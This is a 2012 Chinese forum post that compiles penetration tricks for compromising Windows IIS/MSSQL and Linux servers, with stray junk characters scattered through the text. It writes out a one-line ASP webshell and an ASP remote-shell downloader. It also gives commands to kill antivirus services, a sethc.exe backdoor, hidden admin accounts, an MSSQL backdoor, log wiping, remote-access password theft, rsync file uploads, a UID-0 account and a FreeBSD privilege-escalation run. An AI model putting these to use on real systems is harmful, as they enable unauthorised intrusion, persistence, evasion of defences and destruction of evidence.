中国网络渗透测试联盟

标题: 渗透技巧总结 [打印本页]

---

作者: admin    时间: 2012-9-5 15:00
标题: 渗透技巧总结
旁站路径问题
1、读网站配置。
2、用以下VBS
On Error Resume Next
  B; N  o' J/ q( H; S6 VIf (LCase(Right(WScript.Fullname,11))="wscript.exe") Then
        

Msgbox Space(12) & "IIS Virtual Web Viewer" & Space(12) & Chr(13) & Space(9) & "
7 L1 M( a$ Z; v1 G  W% [8 Q0 a
Usage:Cscript vWeb.vbs",4096,"Lilo"
* N: N3 ?9 b! ?) o/ K1 |        WScript.Quit
* @' M- ^; t. \& l# z. j8 ]4 z" a% @End If
' `, C) Q; x. M# RSet ObjService=GetObject
$ R; b( C, O! h+ I
("IIS://LocalHost/W3SVC")
3 f* R7 Q9 m7 a8 F9 Z- M- F2 nFor Each obj3w In objservice
        If IsNumeric(obj3w.Name)

. R- d9 l* Z, U5 GThen
                Set OService=GetObject("IIS://LocalHost/W3SVC/" & obj3w.Name)
         
" v! I$ t; q/ v6 E" Q* u- V
! }) \" c5 m( H       Set VDirObj = OService.GetObject("IIsWebVirtualDir", "ROOT")
& }, c: `; s' }                If Err

<> 0 Then WScript.Quit (1)
1 N9 y; M3 @/ e  y                WScript.Echo Chr(10) & "[" &

OService.ServerComment & "]"
% B; O4 @# g0 u  _- F6 `; e/ g                For Each Binds In OService.ServerBindings
/ |5 m! }/ N% b8 ^* m1 Z) ~& B     

                   Web = "{ " & Replace(Binds,":"," } { ") & " }"
" g- m# e+ e3 [: `8 X% v7 \$ H                        
( Z( f7 [% Y$ P) U
WScript.Echo Replace(Split(Replace(Web," ",""),"}{")(2),"}","")
                Next
      
2 q# ~2 F3 l3 x5 l# T% Y
         WScript.Echo "ath            : " & VDirObj.Path
" V4 n: O) |7 C/ }  D& V0 f        End If
# {8 K1 @, }, F( j; u. VNext
复制代码
4 V2 p4 h# D  f. L/ ?3、iis_spy列举（注：需要支持ASPX，反IISSPY的方法：将activeds.dll，activeds.tlb降权）
4、得到目标站目录，不能直接跨的。通过echo  ^<%execute(request("cmd"))%^> >>X:\目标目录\X.asp 或者copy 脚本文件 X:\目标目录\X.asp  像目标目录写入webshell。或者还可以试试type命令.
. K! |: q) C. _2 Q$ o- t—————————————————————
WordPress的平台，爆绝对路径的方法是：
% {0 a+ Q5 A1 a4 Yurl/wp-content/plugins/akismet/akismet.php
4 ~5 d2 K/ X. _6 burl/wp-content/plugins/akismet/hello.php
——————————————————————
phpMyAdmin暴路径办法:
" G1 h/ f5 e, w7 l) Y$ YphpMyAdmin/libraries/select_lang.lib.php
phpMyAdmin/darkblue_orange/layout.inc.php
7 D2 n* R1 W7 U6 s5 YphpMyAdmin/index.php?lang[]=1
phpmyadmin/themes/darkblue_orange/layout.inc.php
————————————————————
网站可能目录(注：一般是虚拟主机类）
data/htdocs.网站/网站/
————————————————————
. B+ G4 M0 b& T  p( h4 {$ t6 RCMD下操作VPN相关
: p6 M2 `' Y4 t1 I; j. wnetsh ras set user administrator permit #允许administrator拨入该VPN
: j% \( P$ ]( mnetsh ras set user administrator deny #禁止administrator拨入该VPN
) l( n2 H4 n6 s- D: Dnetsh ras show user #查看哪些用户可以拨入VPN
netsh ras ip show config #查看VPN分配IP的方式
% l* _) y, d5 B( S3 \% Inetsh ras ip set addrassign method = pool #使用地址池的方式分配IP
netsh ras ip add range from = 192.168.3.1 to = 192.168.3.254 #地址池的范围是从192.168.3.1到192.168.3.254
: v$ ]8 m; R4 e————————————————————
( n- S- {3 ?  l- ?  C命令行下添加SQL用户的方法
2 R9 F" }" m: I* V& g4 z; @3 o需要有管理员权限,在命令下先建立一个c:\test.qry文件,内容如下:
' E0 _& T/ c% v+ }; s1 V: I1 Yexec master.dbo.sp_addlogin test,123
# H- e) I6 `" ]% n  ~EXEC sp_addsrvrolemember 'test, 'sysadmin'
然后在DOS下执行:cmd.exe /c isql -E /U alma /P /i c:\test.qry

$ L& y) Z1 P* h3 @另类的加用户方法
在删掉了net.exe和不用adsi之外，新的加用户的方法。代码如下：
js:
var o=new ActiveXObject( "Shell.Users" );
: e8 v& B3 a" ~z=o.create("test") ;
z.changePassword("123456","")
z.setting("AccountType")=3;
6 y" V9 N: N1 D
' s( T$ ]" |+ K# t& \+ x% l: x- \* j" bvbs:
) ]6 r( @5 K- N" l3 K! kSet   o=CreateObject( "Shell.Users" )
Set z=o.create("test")
z.changePassword "123456",""
z.setting("AccountType")=3
——————————————————
cmd访问控制权限控制（注：反everyone不可读，工具-文件夹选项-使用简单的共享去掉即可）

命令如下
cacls c: /e /t /g everyone:F           #c盘everyone权限
cacls "目录" /d everyone               #everyone不可读，包括admin
————————以下配合PR更好————
5 h/ J0 ?- y  n3 G/ u! ?; x  R5 H7 g3389相关
a、防火墙TCP/IP筛选.（关闭net stop policyagent & net stop sharedaccess）
b、内网环境（LCX）
% y4 r% q: j& X; Vc、终端服务器超出了最大允许连接
XP 运行mstsc /admin
2003 运行mstsc /console   
4 z$ ?+ E1 ~! X1 ]) E7 E0 H' Q
4 z" }4 |( C8 O杀软关闭（把杀软所在的文件的所有权限去掉）
& ?: H5 v% m8 c. x6 Z2 ]( E处理变态诺顿企业版：
/ ?) R) r+ n6 a& knet stop "Symantec AntiVirus" /y
net stop "Symantec AntiVirus Definition Watcher" /y
, c. g4 H& A: |net stop "Symantec Event Manager" /y
2 |) A3 I+ Y7 `& ^net stop "System Event Notification" /y
net stop "Symantec Settings Manager" /y

7 ~  _" x9 T2 S& \9 W2 N- ~" @" b9 a卖咖啡：net stop "McAfee McShield"
————————————————————
' S6 q& d0 x" e8 _$ X
5次SHIFT：
, t8 T1 q* `, ~  |9 Gcopy %systemroot%\system32\sethc.exe %systemroot%\system32\dllcache\sethc1.exe
9 q8 d4 E3 [  i' ycopy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe /y
copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe /y
5 o% j; u/ j* I. z8 f' r! W——————————————————————
隐藏账号添加：
1、net user admin$ 123456 /add&net localgroup administrators admin$ /add
2、导出注册表SAM下用户的两个键值
) ?* d8 T6 ]6 U; G( T0 }, [3、在用户管理界面里的admin$删除，然后把备份的注册表导回去。
4、利用Hacker Defender把相关用户注册表隐藏
——————————————————————
MSSQL扩展后门：
USE master;
& m6 k2 ]5 H; C; }" y! Q7 B& y* PEXEC sp_addextendedproc 'xp_helpsystem', 'xp_helpsystem.dll';
GRANT exec On xp_helpsystem TO public;
- d' l+ ~' N  D/ \———————————————————————
日志处理
C:\WINNT\system32\LogFiles\MSFTPSVC1>下有
2 Q- y, O! Z" W$ F3 E& r# }' Kex011120.log / ex011121.log / ex011124.log三个文件，
2 Q; J. J0 n# b+ `; y0 C直接删除 ex0111124.log
不成功，“原文件...正在使用”
当然可以直接删除ex011120.log / ex011121.log
用记事本打开ex0111124.log，删除里面的一些内容后，保存，覆盖退出，成功。
当停止msftpsvc服务后可直接删除ex011124.log

MSSQL查询分析器连接记录清除：
5 s3 t' k  |  H9 Z- tMSSQL 2000位于注册表如下：
) [0 j9 v  b) @. uHKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers
找到接接过的信息删除。
MSSQL 2005是在C:\Documents and Settings\<user>\Application Data\Microsoft\Microsoft SQL
( \, ^7 C  t; u4 p, p. O, t
Server\90\Tools\Shell\mru.dat
—————————————————————————
防BT系统拦截可使用远程下载shell，也达到了隐藏自身的效果，也可以做为超隐蔽的后门，神马的免杀webshell，用服务器安全工具一扫通通挂掉了）

<%
Sub eWebEditor_SaveRemoteFile(s_LocalFileName,s_RemoteFileUrl)
Dim Ads, Retrieval, GetRemoteData
On Error Resume Next
- b; ?  r( O8 b6 D7 s- @Set Retrieval = Server.CreateObject("Microsoft.XMLHTTP")
; C+ G' \; {$ K4 a! f; A; h1 iWith Retrieval
1 b, Z- ?. g/ u- c2 O0 p9 g) r.Open "Get", s_RemoteFileUrl, False, "", ""
* `# v+ d  n2 m7 y/ X* [! d5 c.Send
GetRemoteData = .ResponseBody
7 ?* P% }+ E' d2 T! L5 eEnd With
% k9 n3 r, W, T  K2 \5 x) D. eSet Retrieval = Nothing
" T7 g0 {2 b5 @* d* ^5 |/ fSet Ads = Server.CreateObject("Adodb.Stream")
With Ads
.Type = 1
5 l1 i* I; `! r9 ?7 d: r.Open
.Write GetRemoteData
7 c3 x. r# d: A& a- Z! C. G.SaveToFile Server.MapPath(s_LocalFileName), 2
.Cancel()
.Close()
0 w6 T) h5 X* S; d' U6 M$ r, o# hEnd With
Set Ads=nothing
End Sub
  o, n5 r! k: `$ b
9 Z* Y3 m( M: S/ J/ {eWebEditor_SaveRemoteFile"your shell's name","your shell'urL"
+ G5 I  \- S# x% z( {+ L7 M6 Z) O%>

2 r3 L! H  O7 r0 W+ JVNC提权方法:
* S8 B: c4 K' h4 I利用shell读取vnc保存在注册表中的密文，使用工具VNC4X破解
- {2 _) k7 v+ l: A9 f6 O' c* I注册表位置：HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password
7 c1 E! W7 _1 a2 g5 [& cregedit -e c:\reg.dll "HKEY_LOCAL_MACHINE\SOFTWARE\ORL"
# W5 y4 q* q! Gregedit -e c:\reg.dll "HKEY_LOCAL_MACHINE\Software\RealVNC\WinVNC4"
Radmin 默认端口是4899，
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter//默认密码注册表位置
7 q; v3 z5 S6 H6 ~HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port //默认端口注册表位置
然后用HASH版连接。
如果我们拿到一台主机的WEBSEHLL。通过查找发现其上安装有PCANYWHERE 同时保存密码文件的目录是允许我们的IUSER权限访问，我们可以下载这个CIF文件到本地破解，再通过PCANYWHERE从本机登陆服务器。
保存密码的CIF文件,不是位于PCANYWHERE的安装目录,而且位于安装PCANYWHERE所安装盘的\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 如果PCANYWHERE安装在D:\program\文件下下，那么PCANYWHERE的密码文件就保存在D:\Documents and Settings\All
Users\Application Data\Symantec\pcAnywhere\文件夹下。
——————————————————————
- U: a0 b4 x- d: d) Q8 a. F搜狗输入法的PinyinUp.exe是可读可写的直接替换即可
——————————————————----------
WinWebMail目录下的web必须设置everyone权限可读可写，在开始程序里，找到WinWebMail快捷方式下下
来，看路径，访问 路径\web传shell，访问shell后，权限是system，放远控进启动项，等待下次重启。
1 p" T* ?; p- J% S9 o. }6 _& R2 z没有删cmd组建的直接加用户。
, K  H$ ]) D+ j$ ~, [7i24的web目录也是可写，权限为administrator。

1433 SA点构建注入点。
; c6 {! b: ]8 o4 M; Q  t/ M$ S<%
strSQLServerName = "服务器ip"
/ o; C3 }0 x" M! @6 H1 QstrSQLDBUserName = "数据库帐号"
strSQLDBPassword = "数据库密码"
$ P. ^' A  L7 h- |7 B$ |0 EstrSQLDBName = "数据库名称"
( ^+ j8 F$ ], H8 b1 `) o! CSet conn = Server.createObject("ADODB.Connection")
) W& W- }, m" i. ~0 }strCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName &
# k+ y( Z( y# ~4 u+ F+ _8 S
";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" &

$ R2 A0 B3 W: S2 ostrSQLDBName & ";"
conn.open strCon
dim rs,strSQL,id
set rs=server.createobject("ADODB.recordset")
id = request("id")
strSQL = "select * from ACTLIST where worldid=" & idrs.open strSQL,conn,1,3
# ~: X' p- z7 P( q' Zrs.close
5 Y; a2 z0 W6 W%>
0 u8 a1 r% s' j复制代码
******liunx 相关******
一.ldap渗透技巧
- Z# ?* S3 ^. _3 w" \- G. t1.cat /etc/nsswitch
1 i( m" n, M0 F2 T9 V' d- [, t看看密码登录策略我们可以看到使用了file ldap模式
: Y5 T! o0 r$ w$ [: N6 ^8 I9 W
: t4 |* K' }0 a  ^2 P& c$ R0 [. Z/ C2.less /etc/ldap.conf
& }  {8 @, D" J7 ^+ bbase ou=People,dc=unix-center,dc=net
找到ou,dc,dc设置
1 M; Q! H6 z# _' p8 I. f
0 `5 ^. \  [- _2 ]5 B3.查找管理员信息
匿名方式
  g7 @* o$ w  Zldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b
5 A  N/ h% @( D$ i9 q' s
"cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
有密码形式
ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b

"cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

# e; m: {0 N4 W
. J: p' e8 G4 E3 b* ]& T3 N* L& p4.查找10条用户记录
7 h7 z3 r- \0 }0 Hldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口

实战:
- l# ~5 B. p5 e7 B$ w1.cat /etc/nsswitch
. o  c0 B8 U# N" s: p4 I5 x看看密码登录策略我们可以看到使用了file ldap模式

2.less /etc/ldap.conf
+ r# A/ c, e% p* r  ?% C* f6 M  x8 Fbase ou=People,dc=unix-center,dc=net
找到ou,dc,dc设置

3.查找管理员信息
匿名方式
& g5 ~4 n( [3 Y9 v, f% Oldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b
1 {" N- j- D7 ~, Q: ?2 R2 V
9 _  [' z. N2 f( q0 \3 r"cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
* f5 p' F% }) v# F6 O$ |有密码形式
ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b
, o, P9 q+ |0 o) x% q
, [( k5 f( u  n8 u- v4 h$ ]"cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2


4.查找10条用户记录
ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口
& o+ }8 `  N* b/ x
渗透实战:
1.返回所有的属性
. |, W: U$ l  I; U- F- b% M% vldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s sub "objectclass=*"
version: 1
dn: dc=ruc,dc=edu,dc=cn
dc: ruc
objectClass: domain

. s6 n" V( ]; E/ \# ^dn: uid=manager,dc=ruc,dc=edu,dc=cn
uid: manager
objectClass: inetOrgPerson
objectClass: organizationalPerson
4 c& `" X: }' k4 B. O$ tobjectClass: person
objectClass: top
sn: manager
cn: manager

5 X3 i+ ?6 G! ^, @  a  \dn: uid=superadmin,dc=ruc,dc=edu,dc=cn
( R  l6 Y, x" Y  [# R3 @uid: superadmin
, V# p8 [3 ?+ V( a- a5 nobjectClass: inetOrgPerson
objectClass: organizationalPerson
' U7 C1 r/ b6 H4 P6 G* bobjectClass: person
objectClass: top
- Z7 I7 }1 B  o: c( rsn: superadmin
( T9 j  G, x- mcn: superadmin

' E) A/ D7 r) v/ Xdn: uid=admin,dc=ruc,dc=edu,dc=cn
  @& N( }$ A- Xuid: admin
+ k5 [) O! Y: z9 RobjectClass: inetOrgPerson
2 m$ F8 F; D' y" O. y' I9 M3 hobjectClass: organizationalPerson
+ m$ ~$ j. l& `( robjectClass: person
" i+ l( \, q! D9 }( B+ {objectClass: top
' t, T- w4 j! {) s; x$ N! Osn: admin
cn: admin
  Q+ t  d% b! w4 |
' D9 V& k( ^! a" r  m7 Rdn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cn
) i7 D' y4 {( q/ g4 K0 ]( u2 M- Uuid: dcp_anonymous
objectClass: top
objectClass: person
2 P! P2 C( w% v, [9 v0 ZobjectClass: organizationalPerson
objectClass: inetOrgPerson
sn: dcp_anonymous
cn: dcp_anonymous
6 e( r: `# r; f
0 }$ ?2 u5 I7 Z6 y# U) z6 b2.查看基类
bash-3.00# ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s base "objectclass=*" |

more
; y; u8 ]6 P5 r9 n8 H' a% Gversion: 1
" J1 [8 G5 a* T/ f2 kdn: dc=ruc,dc=edu,dc=cn
% I0 X" ^: h# d# O3 h. Fdc: ruc
9 O/ H* t: ?; n& K: s2 AobjectClass: domain

3.查找
bash-3.00# ldapsearch -h 192.168.7.33 -b "" -s base "objectclass=*"
version: 1
- \( ~" N7 L9 b* Y; W! w0 ^2 ndn:
objectClass: top
7 G$ H3 m6 G1 p5 X+ U5 lnamingContexts: dc=ruc,dc=edu,dc=cn
% v, Y0 Z/ }! O- U, E  RsupportedExtension: 2.16.840.1.113730.3.5.7
supportedExtension: 2.16.840.1.113730.3.5.8
% t# ^/ V: e) ^9 ^supportedExtension: 1.3.6.1.4.1.4203.1.11.1
5 k0 ^2 u3 P! a  i  v. isupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.25
/ C2 o% b2 {1 t+ }4 B* A$ FsupportedExtension: 2.16.840.1.113730.3.5.3
3 w  ?2 h0 l$ B) G* bsupportedExtension: 2.16.840.1.113730.3.5.5
! s5 {2 z: _6 K2 ?6 |supportedExtension: 2.16.840.1.113730.3.5.6
supportedExtension: 2.16.840.1.113730.3.5.4
2 }9 a+ ~+ V9 y) a$ o4 o1 nsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.1
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.2
0 w1 J3 o5 v& ^* N: [2 d. y" G* ZsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.3
, m1 s( q4 {' A' |; P; ~supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.4
$ S% Y, W$ {! V7 |0 D4 x- {' QsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.5
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.6
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.7
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.8
, ?7 y# ]' N$ N1 Y0 jsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.9
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.23
% J5 A5 }8 O+ U1 p" |1 EsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.11
: g0 ]) z. v% w* k5 @supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.12
3 O. l  I7 c5 P0 wsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.13
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.14
( b6 k) A3 |* H4 s, L: t4 q  psupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.15
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.16
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.17
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.18
! T7 k1 t5 _) b! DsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.19
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.21
% b" {/ L# V# B- asupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.22
( z/ Q! L# ^5 Q8 M1 r% j( xsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.24
supportedExtension: 1.3.6.1.4.1.1466.20037
supportedExtension: 1.3.6.1.4.1.4203.1.11.3
- J, z# h; o; m( u2 K  f% WsupportedControl: 2.16.840.1.113730.3.4.2
% h; l9 C- H+ v7 j* u9 YsupportedControl: 2.16.840.1.113730.3.4.3
: E7 \3 r" S# Y/ a6 qsupportedControl: 2.16.840.1.113730.3.4.4
supportedControl: 2.16.840.1.113730.3.4.5
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 2.16.840.1.113730.3.4.9
; A. s# n4 M7 |3 Y, KsupportedControl: 2.16.840.1.113730.3.4.16
9 j5 y+ Z' L% G# T6 HsupportedControl: 2.16.840.1.113730.3.4.15
supportedControl: 2.16.840.1.113730.3.4.17
7 M& y6 j: Z0 B! P6 lsupportedControl: 2.16.840.1.113730.3.4.19
4 s  c, p% f) g! t% x" Y' YsupportedControl: 1.3.6.1.4.1.42.2.27.9.5.2
% j+ Z6 P# a2 K6 c3 msupportedControl: 1.3.6.1.4.1.42.2.27.9.5.6
supportedControl: 1.3.6.1.4.1.42.2.27.9.5.8
8 @" x+ F% G. r% n9 ?  xsupportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
7 I; ?: C! ]5 D3 N5 u' ]supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
  c& [9 U2 q: ]% RsupportedControl: 2.16.840.1.113730.3.4.14
; F5 D/ P& Z1 G8 K5 F7 Q) [supportedControl: 1.3.6.1.4.1.1466.29539.12
supportedControl: 2.16.840.1.113730.3.4.12
/ t, }+ C' k4 U! [$ `. LsupportedControl: 2.16.840.1.113730.3.4.18
supportedControl: 2.16.840.1.113730.3.4.13
supportedSASLMechanisms: EXTERNAL
: ^. z7 t. g8 d4 c! N4 l% p5 OsupportedSASLMechanisms: DIGEST-MD5
" k5 R' w+ q+ l# ~6 usupportedLDAPVersion: 2
5 v% N4 J6 t7 f  U+ h5 psupportedLDAPVersion: 3
vendorName: Sun Microsystems, Inc.
vendorVersion: Sun-Java(tm)-System-Directory/6.2
5 X& B. i$ C$ \" R" c' idataversion: 020090516011411
$ s5 c5 X9 q( i0 B7 J1 @netscapemdsuffix: cn=ldap://dc=webA:389
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
3 L" K1 S- g( A( k5 r/ QsupportedSSLCiphers: TLS_DHE_RSA_WITH_AES_256_CBC_SHA
  ~. v9 D! P0 Q6 E8 b5 `, B: n$ IsupportedSSLCiphers: TLS_DHE_DSS_WITH_AES_256_CBC_SHA
( k) s7 o  V  o) \7 D# |8 |& BsupportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_256_CBC_SHA
* s/ D  B# @. }. KsupportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_RSA_WITH_AES_256_CBC_SHA
% t+ C3 D: X2 Q' b+ {4 usupportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_RC4_128_SHA
* @- E/ G0 Y9 ^" V1 \) \2 ssupportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_DHE_DSS_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_128_CBC_SHA
% ?9 _8 ^, O, f2 h: y" t8 p; G1 E! WsupportedSSLCiphers: TLS_ECDH_RSA_WITH_RC4_128_SHA
( y9 Z% l" Z+ Z  ^* {6 KsupportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_128_CBC_SHA
0 X7 ~+ r  n" d1 c6 w4 y7 z+ asupportedSSLCiphers: TLS_ECDH_ECDSA_WITH_RC4_128_SHA
! T$ m) s- \$ M& ?& nsupportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: SSL_RSA_WITH_RC4_128_MD5
. Z$ d6 v# y" X4 ~' T, E# YsupportedSSLCiphers: SSL_RSA_WITH_RC4_128_SHA
# f: h. i0 _9 \) I# dsupportedSSLCiphers: TLS_RSA_WITH_AES_128_CBC_SHA
" I* h6 d3 K: S% D, QsupportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA
& t" A+ R1 q. q. c4 c; U9 u+ M8 KsupportedSSLCiphers: SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA
' [) [$ m* ~1 V. L/ L, KsupportedSSLCiphers: TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA
+ H. b5 Z7 X0 M5 T: B. bsupportedSSLCiphers: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA
/ K2 l4 p7 B1 k1 DsupportedSSLCiphers: SSL_RSA_WITH_3DES_EDE_CBC_SHA
& w& C+ q2 F! c+ |. HsupportedSSLCiphers: SSL_DHE_RSA_WITH_DES_CBC_SHA
supportedSSLCiphers: SSL_DHE_DSS_WITH_DES_CBC_SHA
, X9 |& p4 j# E& Y0 J; psupportedSSLCiphers: SSL_RSA_FIPS_WITH_DES_CBC_SHA
supportedSSLCiphers: SSL_RSA_WITH_DES_CBC_SHA
supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_RC4_56_SHA
& G) H* q7 ?( e6 A% JsupportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA
supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC4_40_MD5
7 M  F4 A( D- ^! D% |supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC2_CBC_40_MD5
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_NULL_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_NULL_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_NULL_SHA
! v( K- p8 j" d; CsupportedSSLCiphers: TLS_ECDH_ECDSA_WITH_NULL_SHA
supportedSSLCiphers: SSL_RSA_WITH_NULL_SHA
  P* v4 F$ |' f: x, `1 ^+ usupportedSSLCiphers: SSL_RSA_WITH_NULL_MD5
; e  c/ A5 E* XsupportedSSLCiphers: SSL_CK_RC4_128_WITH_MD5
supportedSSLCiphers: SSL_CK_RC2_128_CBC_WITH_MD5
. R' Y- t" P9 H1 ]supportedSSLCiphers: SSL_CK_DES_192_EDE3_CBC_WITH_MD5
supportedSSLCiphers: SSL_CK_DES_64_CBC_WITH_MD5
7 k' d8 N% y0 |0 A# isupportedSSLCiphers: SSL_CK_RC4_128_EXPORT40_WITH_MD5
: `/ S4 B9 D/ P; S2 JsupportedSSLCiphers: SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5
————————————
2. NFS渗透技巧
showmount -e ip
0 z  N5 n' `- q; f, b/ x  `列举IP
9 c: E* w, d) f( }" F% I——————
; Y# T, [: b3 M: D8 W3.rsync渗透技巧
% o' Y- k. _0 G8 E  ^& f  h1.查看rsync服务器上的列表
rsync 210.51.X.X::
finance
& n5 X8 O+ e! O3 f9 \" timg_finance
auto
4 o& ?; C, W6 ^5 d0 eimg_auto
html_cms
* p7 i  ?4 x$ @: y: Mimg_cms
) o5 L) t  h3 Q6 Q8 cent_cms
/ B0 K7 h! r! B* vent_img
ceshi
, L4 A* B1 D" D9 l* ores_img
res_img_c2
chip
chip_c2
) M8 x$ O+ M# c7 e" g& N$ \7 Fent_icms
; s# _. e6 i/ B+ L: a/ H7 jgames
+ r6 Y; L0 R6 {" E' c& n1 Agamesimg
media
9 v2 D- s0 H5 \9 k  \mediaimg
3 }6 j( M$ b- j& e$ Lfashion
. t$ L. j0 d1 g" Tres-fashion
res-fo
taobao-home
res-taobao-home
house
7 S. O8 D* B- h) E3 O- m7 J2 ^res-house
res-home
$ l. L0 L: n2 t; f" x! H7 p' q" cres-edu
res-ent
& y, p6 F1 D; |" G5 ores-labs
res-news
res-phtv
5 k5 e( B7 @7 Wres-media
home
! F* H% H- T- z$ B8 g6 Z- cedu
news
0 U6 t# c; l3 @  I" m  ~: ires-book
% Y# I) q7 ~0 t  M7 v4 l: X% e
# w" t0 \" D7 ?& T1 f9 G2 u看相应的下级目录(注意一定要在目录后面添加上/)


rsync 210.51.X.X::htdocs_app/
rsync 210.51.X.X::auto/
rsync 210.51.X.X::edu/
* Y$ b$ i' ^0 s1 f* o2 z& r
1 P1 C) |$ ?" R& x; F2.下载rsync服务器上的配置文件
rsync -avz 210.51.X.X::htdocs_app/ /tmp/app/
9 @  q5 u7 n. W2 `9 w0 h5 l& Z2 _) |
3.向上更新rsync文件(成功上传,不会覆盖)
rsync -avz nothack.php 210.51.X.X::htdocs_app/warn/
9 B( L  L, m/ i* Q) \) d2 chttp://app.finance.xxx.com/warn/nothack.txt

四.squid渗透技巧
; L. O0 T5 C7 H9 q9 Wnc -vv baidu.com 80
GET HTTP://www.sina.com / HTTP/1.0
GET HTTP://WWW.sina.com:22 / HTTP/1.0
五.SSH端口转发
ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip
* N3 t# {& s! p. @8 n. }
1 `5 S, g; J) V9 T  o, z% B( \+ N六.joomla渗透小技巧
& s; B0 E- Z- s% o确定版本
; B, x1 F+ W; G- a6 z+ `index.php?option=com_content&view=article&id=30:what-languages-are-supported-by-joomla-

15&catid=32:languages&Itemid=47
  E3 a! m) j9 P% f1 {
重新设置密码
index.php?option=com_user&view=reset&layout=confirm

. A9 N" B# r+ s1 C七: Linux添加UID为0的root用户
useradd -o -u 0 nothack
1 J7 O" H$ u" [9 D4 W
八.freebsd本地提权
[argp@julius ~]$ uname -rsi
* freebsd 7.3-RELEASE GENERIC
* [argp@julius ~]$ sysctl vfs.usermount
6 X3 g% K( J5 r- [+ W* vfs.usermount: 1
- v) g  T3 u- m1 R& G& f* [argp@julius ~]$ id
4 g8 z. f( [8 Q, K; x/ e* uid=1001(argp) gid=1001(argp) groups=1001(argp)
* [argp@julius ~]$ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex
* [argp@julius ~]$ ./nfs_mount_ex
*
calling nmount()
# R5 l2 Z2 @. b
（注：本文原件由0x童鞋收集整理，感谢0x童鞋，本人补充和优化了点，本文毫无逻辑可言，因为是想到什么就写了，大家见谅）
——————————————
